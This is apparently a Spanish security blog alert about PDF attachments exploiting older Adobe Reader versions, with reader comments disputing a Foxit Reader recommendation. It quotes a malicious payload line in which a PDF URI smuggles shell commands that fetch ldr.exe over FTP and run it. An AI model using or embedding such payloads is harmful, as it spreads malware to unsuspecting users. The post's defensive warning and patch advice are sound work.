Buenas,
Pese a que es un tema nada reciente y solucionado por el fabricante hace un par de días, parece que empieza a haber una cantidad ingente de exploits in the wild circulando, y la gente que no se ha enterado no ha actualizado. Así pues, me váis a permitir que emita la alerta.
Especialmente peligroso es que estos falsos documentos PDF se están enviando como adjuntos al correo pueden provocar familiaridad entre los receptores. El formato PDF siempre ha gozado de una falsa apariencia de seguridad entre los usuarios, ya que pese a ser un formato seguro, no siempre son seguros los clientes que permiten visualizar documentos portables. Los usuarios suelen confiar en PDF, asumiendo que nada malo les puede pasar.
Estos exploits están llegando a los buzones como adjuntos «BILL.pdf» y «INVOICE.pdf», aunque es factible que estos nombres se vayan permutando. El formato del exploit viene a ser parecido al siguiente:
obj< 1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>
En este ejemplo podemos comprobar que la carga maliciosa provoca la desactivación del firewall de Windows (netsh firewall set opmode mode=disable), la recogida de un FTP malicioso del fichero ldr.exe (get /ldr.exe) y su ejecución (start ldr.exe). Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso. Una vez instalado el fichero, no queda ahí la cosa: ldr.exe, o cualquiera que sea el ejecutable malicioso instalado aprovechando la vulnerabilidad descrita, será con toda probabilidad un huevo kinder con su correspondiente regalito: un troyano para robar credenciales, un control remoto para integrar la máquina en un botnet … cualquier combinación es posible.
Para evitar problemas, actualizad siguiendo las recomendaciones de Adobe y no perdáis de vista lo que recomienda SANS. Os proporciono dos enlaces:
Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.
Los usuarios de Windows pueden recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad. Una opción muy recomendable es Foxit Reader. Si lo que quieréis es una aplicación libre para generar PDF, podéis emplear las herramientas Ghostscript.
NOTA IMPORTANTE: Sólo los usuarios de Windows XP con Internet Explorer 7 están afectados por la vulnerabilidad descrita.
Un saludo,
Foxit reader tambien esta afectado.
on the wild o «in the wild»???
abc,
Gracias. Efectivamente es «in» :)
De Foxit Reader no he visto nada. Por lo que pude ver era un problema exclusivo de los productos Adobe citados, aunque no tengo el 100% de garantías.
Pues entonces no lo recomiendes si no sabes ni tienes 100% de garantías.
abc,
La idea de recomendar el producto, y a ver si te molestas en leer antes de rajar, es recomendar un lector PDF que tal y como dice el artículo permita «recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad»
Si sabes leer, que parece que no sabes, verás que la recomendación es GENERAL, y con la idea de que la gente disponga de un producto menos expuesto, que además es más rápido y zampa menos memoria que Adobe Reader.
En el momento de emitir la alerta no había (y sigue sin haber en fuentes confiables) confirmación de que Foxit 2.x sea vulnerable:
http://secunia.com/product/12995/?task=advisories_2007
De todos modos, mándame una nota de contacto, y la próxima vez que vaya a escribir te consulto antes si puedo o no puedo hablar de lo que estime conveniente.
Sin acritud,
Más información sobre el asunto:
http://www.f-secure.com/v-descs/exploit_w32_adobereader_k.shtml
http://www.f-secure.com/weblog/archives/00001303.html
Parece que el tema sigue en alza.